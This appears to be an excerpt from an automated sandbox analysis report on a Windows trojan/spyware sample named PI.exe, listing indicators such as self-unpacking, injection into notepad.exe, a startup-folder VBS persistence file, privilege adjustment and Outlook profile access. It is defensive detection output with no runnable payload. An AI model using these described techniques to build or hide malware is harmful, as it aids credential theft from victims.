Source: PI.exe, 00000005.00000002.708009088.0000000002470000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs PI.exe
Source: PI.exe	Binary or memory string: OriginalFilename vs PI.exe
Source: PI.exe, 00000007.00000002.706572619.0000000000B42000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameyZFlSsyWYLpOIrYUuUqNGPSmFjhfv.exe4 vs PI.exe

Source: 0.2.PI.exe.2770000.3.unpack, gtu.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.PI.exe.2770000.3.unpack, gtu.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
Source: 0.2.PI.exe.2770000.3.unpack, gtu.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformBlock'
Source: 0.2.PI.exe.2770000.3.unpack, DPAPI.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 0.2.PI.exe.2770000.3.unpack, DPAPI.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 2.2.PI.exe.21e0000.2.unpack, gtu.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.PI.exe.21e0000.2.unpack, gtu.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
Source: 2.2.PI.exe.21e0000.2.unpack, gtu.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformBlock'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@16/2@1/2

Source: C:\Users\user\Desktop\PI.exe

Code function: 0_2_00420A54 GetLastError,FormatMessageA,

0_2_00420A54

Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_0233B1E6 AdjustTokenPrivileges,		2_2_0233B1E6
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_0233B1AF AdjustTokenPrivileges,		2_2_0233B1AF

Source: C:\Users\user\Desktop\PI.exe

Code function: 0_2_00408B5E GetDiskFreeSpaceA,

0_2_00408B5E

Source: C:\Users\user\Desktop\PI.exe

Code function: 0_2_004171B0 FindResourceA,LoadResource,SizeofResource,LockResource,

0_2_004171B0

Source: C:\Windows\SysWOW64\notepad.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\STRATUP.vbs

Jump to behavior

Source: C:\Users\user\Desktop\PI.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Source: unknown

Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\STRATUP.vbs'

Source: C:\Users\user\Desktop\PI.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Users\user\Desktop\PI.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Users\user\Desktop\PI.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\PI.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\PI.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\PI.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: PI.exe

ReversingLabs: Detection: 52%

Source: unknown	Process created: C:\Users\user\Desktop\PI.exe 'C:\Users\user\Desktop\PI.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\notepad.exe C:\Windows\system32\notepad.exe
Source: unknown	Process created: C:\Users\user\Desktop\PI.exe 'C:\Users\user\Desktop\PI.exe'
Source: unknown	Process created: C:\Users\user\Desktop\PI.exe 'C:\Users\user\Desktop\PI.exe' 2 5152 5197828
Source: unknown	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\STRATUP.vbs'
Source: unknown	Process created: C:\Users\user\Desktop\PI.exe 'C:\Users\user\Desktop\PI.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\notepad.exe C:\Windows\system32\notepad.exe
Source: unknown	Process created: C:\Users\user\Desktop\PI.exe 'C:\Users\user\Desktop\PI.exe'
Source: unknown	Process created: C:\Users\user\Desktop\PI.exe 'C:\Users\user\Desktop\PI.exe' 2 6728 5209890
Source: C:\Users\user\Desktop\PI.exe	Process created: C:\Windows\SysWOW64\notepad.exe C:\Windows\system32\notepad.exe	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process created: C:\Users\user\Desktop\PI.exe 'C:\Users\user\Desktop\PI.exe'	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process created: C:\Users\user\Desktop\PI.exe 'C:\Users\user\Desktop\PI.exe' 2 5152 5197828	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\Desktop\PI.exe 'C:\Users\user\Desktop\PI.exe'	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process created: C:\Windows\SysWOW64\notepad.exe C:\Windows\system32\notepad.exe	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process created: C:\Users\user\Desktop\PI.exe 'C:\Users\user\Desktop\PI.exe'	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process created: C:\Users\user\Desktop\PI.exe 'C:\Users\user\Desktop\PI.exe' 2 6728 5209890	Jump to behavior

Source: C:\Users\user\Desktop\PI.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\PI.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\PI.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: C:\Users\user\Desktop\PI.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll

Jump to behavior

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\PI.exe

Unpacked PE file: 2.2.PI.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rsrc:R;.reloc:R;

Detected unpacking (creates a PE file in dynamic memory)

Show sources

Source: C:\Users\user\Desktop\PI.exe

Unpacked PE file: 2.2.PI.exe.2250000.3.unpack

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\PI.exe

Unpacked PE file: 2.2.PI.exe.400000.0.unpack

.NET source code contains potential unpacker

Show sources

Source: 0.2.PI.exe.2770000.3.unpack, gtu.cs	.Net Code: ncv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.2.PI.exe.21e0000.2.unpack, gtu.cs	.Net Code: ncv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.2.PI.exe.2250000.3.unpack, gtu.cs	.Net Code: ncv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.2.PI.exe.400000.0.unpack, gtu.cs	.Net Code: ncv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.2.PI.exe.bb0000.3.unpack, gtu.cs	.Net Code: ncv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.2.PI.exe.b40000.2.unpack, gtu.cs	.Net Code: ncv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\user\Desktop\PI.exe

Code function: 0_2_00440918 SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode,

0_2_00440918

Source: C:\Users\user\Desktop\PI.exe	Code function: 0_2_00440F64 push 00440FF1h; ret	0_2_00440FE9
Source: C:\Users\user\Desktop\PI.exe	Code function: 0_2_0040C076 push 0040C0E7h; ret	0_2_0040C0DF
Source: C:\Users\user\Desktop\PI.exe	Code function: 0_2_0040C078 push 0040C0E7h; ret	0_2_0040C0DF
Source: C:\Users\user\Desktop\PI.exe	Code function: 0_2_0040C156 push 0040C184h; ret	0_2_0040C17C
Source: C:\Users\user\Desktop\PI.exe	Code function: 0_2_0040C158 push 0040C184h; ret	0_2_0040C17C
Source: C:\Users\user\Desktop\PI.exe	Code function: 0_2_004421E4 push ecx; mov dword ptr [esp], edx	0_2_004421E8
Source: C:\Users\user\Desktop\PI.exe	Code function: 0_2_004101F0 push 004103F1h; ret	0_2_004103E9
Source: C:\Users\user\Desktop\PI.exe	Code function: 0_2_0041018C push 004101EDh; ret	0_2_004101E5
Source: C:\Users\user\Desktop\PI.exe	Code function: 0_2_004642CC push 004642F8h; ret	0_2_004642F0
Source: C:\Users\user\Desktop\PI.exe	Code function: 0_2_004103F4 push 00410538h; ret	0_2_00410530
Source: C:\Users\user\Desktop\PI.exe	Code function: 0_2_004264A8 push 00426578h; ret	0_2_00426570
Source: C:\Users\user\Desktop\PI.exe	Code function: 0_2_0041050C push 00410538h; ret	0_2_00410530
Source: C:\Users\user\Desktop\PI.exe	Code function: 0_2_0044251C push 00442548h; ret	0_2_00442540
Source: C:\Users\user\Desktop\PI.exe	Code function: 0_2_0040659E push 004065F1h; ret	0_2_004065E9
Source: C:\Users\user\Desktop\PI.exe	Code function: 0_2_004065A0 push 004065F1h; ret	0_2_004065E9
Source: C:\Users\user\Desktop\PI.exe	Code function: 0_2_00460674 push 004606A0h; ret	0_2_00460698
Source: C:\Users\user\Desktop\PI.exe	Code function: 0_2_004306D0 push 0043073Ah; ret	0_2_00430732
Source: C:\Users\user\Desktop\PI.exe	Code function: 0_2_0041C680 push ecx; mov dword ptr [esp], edx	0_2_0041C685
Source: C:\Users\user\Desktop\PI.exe	Code function: 0_2_00426688 push 004266B4h; ret	0_2_004266AC
Source: C:\Users\user\Desktop\PI.exe	Code function: 0_2_00406770 push 0040679Ch; ret	0_2_00406794
Source: C:\Users\user\Desktop\PI.exe	Code function: 0_2_0043073C push 004307A6h; ret	0_2_0043079E
Source: C:\Users\user\Desktop\PI.exe	Code function: 0_2_0040682C push 00406858h; ret	0_2_00406850
Source: C:\Users\user\Desktop\PI.exe	Code function: 0_2_00426940 push 0042696Ch; ret	0_2_00426964
Source: C:\Users\user\Desktop\PI.exe	Code function: 0_2_0041A914 push ecx; mov dword ptr [esp], edx	0_2_0041A916
Source: C:\Users\user\Desktop\PI.exe	Code function: 0_2_0045691C push 00456976h; ret	0_2_0045696E
Source: C:\Users\user\Desktop\PI.exe	Code function: 0_2_004289CC push 004289F8h; ret	0_2_004289F0
Source: C:\Users\user\Desktop\PI.exe	Code function: 0_2_00428980 push 004289C1h; ret	0_2_004289B9
Source: C:\Users\user\Desktop\PI.exe	Code function: 0_2_00428A04 push 00428A3Ch; ret	0_2_00428A34
Source: C:\Users\user\Desktop\PI.exe	Code function: 0_2_00456B34 push ecx; mov dword ptr [esp], edx	0_2_00456B39
Source: C:\Users\user\Desktop\PI.exe	Code function: 0_2_00412BE4 push ecx; mov dword ptr [esp], eax	0_2_00412BE5
Source: C:\Users\user\Desktop\PI.exe	Code function: 0_2_0042EBF4 push 0042EC20h; ret	0_2_0042EC18

Boot Survival:

Drops VBS files to the startup folder

Show sources

Source: C:\Windows\SysWOW64\notepad.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\STRATUP.vbs
Source: C:\Windows\SysWOW64\notepad.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\STRATUP.vbs			Jump to dropped file

Source: C:\Windows\SysWOW64\notepad.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\STRATUP.vbs

Jump to behavior

Source: C:\Windows\SysWOW64\notepad.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\STRATUP.vbs			Jump to behavior
Source: C:\Windows\SysWOW64\notepad.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\STRATUP.vbs			Jump to behavior

Source: C:\Users\user\Desktop\PI.exe	Code function: 0_2_00454858 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	0_2_00454858
Source: C:\Users\user\Desktop\PI.exe	Code function: 0_2_0043C504 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,	0_2_0043C504
Source: C:\Users\user\Desktop\PI.exe	Code function: 0_2_00454F4C IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,	0_2_00454F4C
Source: C:\Users\user\Desktop\PI.exe	Code function: 0_2_00454FFC IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,	0_2_00454FFC
Source: C:\Users\user\Desktop\PI.exe	Code function: 0_2_0043B378 IsIconic,GetCapture,	0_2_0043B378
Source: C:\Users\user\Desktop\PI.exe	Code function: 0_2_00427394 IsIconic,GetWindowPlacement,GetWindowRect,	0_2_00427394
Source: C:\Users\user\Desktop\PI.exe	Code function: 0_2_0045194C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,	0_2_0045194C
Source: C:\Users\user\Desktop\PI.exe	Code function: 0_2_0043BC20 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,	0_2_0043BC20
Source: C:\Users\user\Desktop\PI.exe	Code function: 3_2_00454858 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	3_2_00454858
Source: C:\Users\user\Desktop\PI.exe	Code function: 3_2_0043C504 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,	3_2_0043C504
Source: C:\Users\user\Desktop\PI.exe	Code function: 3_2_00454F4C IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,	3_2_00454F4C
Source: C:\Users\user\Desktop\PI.exe	Code function: 3_2_00454FFC IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,	3_2_00454FFC
Source: C:\Users\user\Desktop\PI.exe	Code function: 3_2_0043B378 IsIconic,GetCapture,	3_2_0043B378
Source: C:\Users\user\Desktop\PI.exe	Code function: 3_2_00427394 IsIconic,GetWindowPlacement,GetWindowRect,	3_2_00427394
Source: C:\Users\user\Desktop\PI.exe	Code function: 3_2_0045194C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,	3_2_0045194C
Source: C:\Users\user\Desktop\PI.exe	Code function: 3_2_0043BC20 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,	3_2_0043BC20
Source: C:\Users\user\Desktop\PI.exe	Code function: 5_2_00454858 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	5_2_00454858
Source: C:\Users\user\Desktop\PI.exe	Code function: 5_2_0043C504 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,	5_2_0043C504
Source: C:\Users\user\Desktop\PI.exe	Code function: 5_2_00454F4C IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,	5_2_00454F4C
Source: C:\Users\user\Desktop\PI.exe	Code function: 5_2_00454FFC IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,	5_2_00454FFC
Source: C:\Users\user\Desktop\PI.exe	Code function: 5_2_0043B378 IsIconic,GetCapture,	5_2_0043B378
Source: C:\Users\user\Desktop\PI.exe	Code function: 5_2_00427394 IsIconic,GetWindowPlacement,GetWindowRect,	5_2_00427394
Source: C:\Users\user\Desktop\PI.exe	Code function: 5_2_0045194C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,	5_2_0045194C
Source: C:\Users\user\Desktop\PI.exe	Code function: 5_2_0043BC20 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,	5_2_0043BC20

Source: C:\Users\user\Desktop\PI.exe

0_2_00440918

Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
